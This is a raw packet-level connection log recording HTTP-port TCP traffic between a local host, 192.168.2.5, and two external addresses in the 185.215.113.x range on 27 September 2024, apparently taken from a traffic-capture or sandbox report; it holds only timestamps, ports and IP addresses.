Sep 27, 2024 04:21:17.764662027 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.764694929 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.764700890 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.764700890 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.764708042 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.764719963 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.764730930 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.764763117 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.764858961 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.783123016 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.783142090 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.783154011 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.783176899 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.783189058 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.783200979 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.783214092 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.783258915 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.783341885 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.783448935 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.783461094 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.783473015 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.783510923 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.783526897 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.783539057 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.783545971 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.783551931 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.783584118 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.783622980 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.783637047 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.783653975 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.783664942 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.783675909 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.783682108 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.783689022 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.783701897 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.783706903 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.783716917 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.783730030 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.783734083 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.783749104 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.783771038 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.783828974 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.783869982 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.783878088 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.783881903 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.783906937 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.783914089 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.783925056 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.783926964 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.783938885 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.783946991 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.783967018 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.783967972 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.783977985 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.783989906 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.783991098 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.784002066 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784014940 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.784027100 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784034967 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.784038067 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784075975 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.784075975 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784087896 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784101009 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.784116983 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.784126997 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784163952 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.784188032 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784199953 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784209967 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784223080 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784234047 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784238100 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.784257889 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.784288883 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.784424067 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784435987 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784447908 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784461021 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.784473896 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.784476042 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.784487009 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.784491062 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.784503937 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.784514904 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.784524918 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.784537077 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.784552097 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.784552097 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.784554005 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784568071 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784585953 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784595013 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.784595966 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784599066 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.784607887 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784626007 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784631014 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.784645081 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784655094 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784667969 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.784672022 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.784684896 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784688950 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.784698009 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784710884 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784722090 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784738064 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.784751892 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784763098 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.784764051 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784775972 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784785032 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784786940 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.784818888 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.784826994 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784845114 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784856081 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784868002 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784882069 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.784905910 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.784924984 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784936905 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784949064 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784960032 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.784974098 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.785005093 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.785013914 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.785029888 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.785041094 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.785052061 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.785063028 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.785069942 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.785075903 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.785087109 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.785089970 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.785099030 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.785123110 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.785156965 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.785525084 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.785536051 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.785576105 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.786561012 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.786571026 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.786581993 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.786613941 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.786626101 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.786628008 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.786638975 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.786679983 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.787030935 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.787044048 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.787091017 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.818319082 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.818362951 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.818373919 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.818386078 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.818386078 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.818397999 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.818411112 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.818424940 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.818464994 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.818480968 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.818480968 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.818510056 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.820638895 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.820662975 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.820674896 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.820704937 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.820744038 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.820775986 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.820787907 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.820800066 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.820851088 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.820851088 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.825283051 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.825298071 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.825321913 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.825333118 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.825346947 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.825356960 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.825371027 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.825381041 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.825398922 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.825409889 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.825413942 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.825413942 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.825423956 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.825465918 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.825465918 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.825479031 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.825489998 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.825509071 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.825520039 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.825546026 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.825561047 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.825561047 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.825830936 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.826562881 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.826584101 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.826594114 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.826618910 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.826662064 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.826673031 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.826683998 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.826694965 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.826718092 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.826718092 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.826771021 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.826786041 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.826936007 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.827238083 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.827285051 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.827300072 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.827311993 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.827402115 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.827411890 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.827424049 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.827435970 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.827445984 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.827451944 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.827451944 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.827771902 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.827951908 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.827970982 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.827980995 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.827991962 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.828010082 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.828022003 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.828032970 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.828038931 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.828038931 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.828051090 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.828064919 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.828094959 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.828107119 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.828115940 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.828115940 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.828119993 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.828170061 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.828170061 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.828212023 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.828222990 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.828236103 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.828246117 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.828284979 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.828284979 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.828510046 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.828552008 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.828568935 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.828582048 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.828593016 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.828594923 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.828604937 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.828654051 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.828654051 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.828695059 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.828707933 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.828720093 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.828730106 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.828741074 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.828766108 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.828782082 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.828792095 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.828803062 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.828811884 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.828814983 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.828815937 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.828815937 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.828828096 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.828840971 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.828847885 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.828847885 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.828862906 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.828867912 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.828876019 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.828895092 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.828905106 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.828911066 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.828916073 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.828927040 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.828941107 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.828957081 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.828968048 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.828975916 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.828986883 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.828998089 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.829010010 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.829020977 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.829027891 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.829030991 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.829031944 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.829049110 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.829055071 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.829062939 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.829073906 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.829083920 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.829098940 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.829108953 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.829121113 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.829123974 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.829147100 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.829168081 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.829210043 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.829221010 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.829231977 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.829242945 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.829250097 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.829252958 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.829269886 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.829277039 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.829288006 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.829299927 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.829309940 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.829329014 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.829341888 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.829344988 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.829356909 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.829369068 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.829380035 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.829384089 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.829404116 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.829437971 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.829473972 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.829485893 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.829498053 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.829505920 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.829514980 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.829547882 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.829756021 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.829766989 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.829778910 CEST	80	49722	185.215.113.17	192.168.2.5
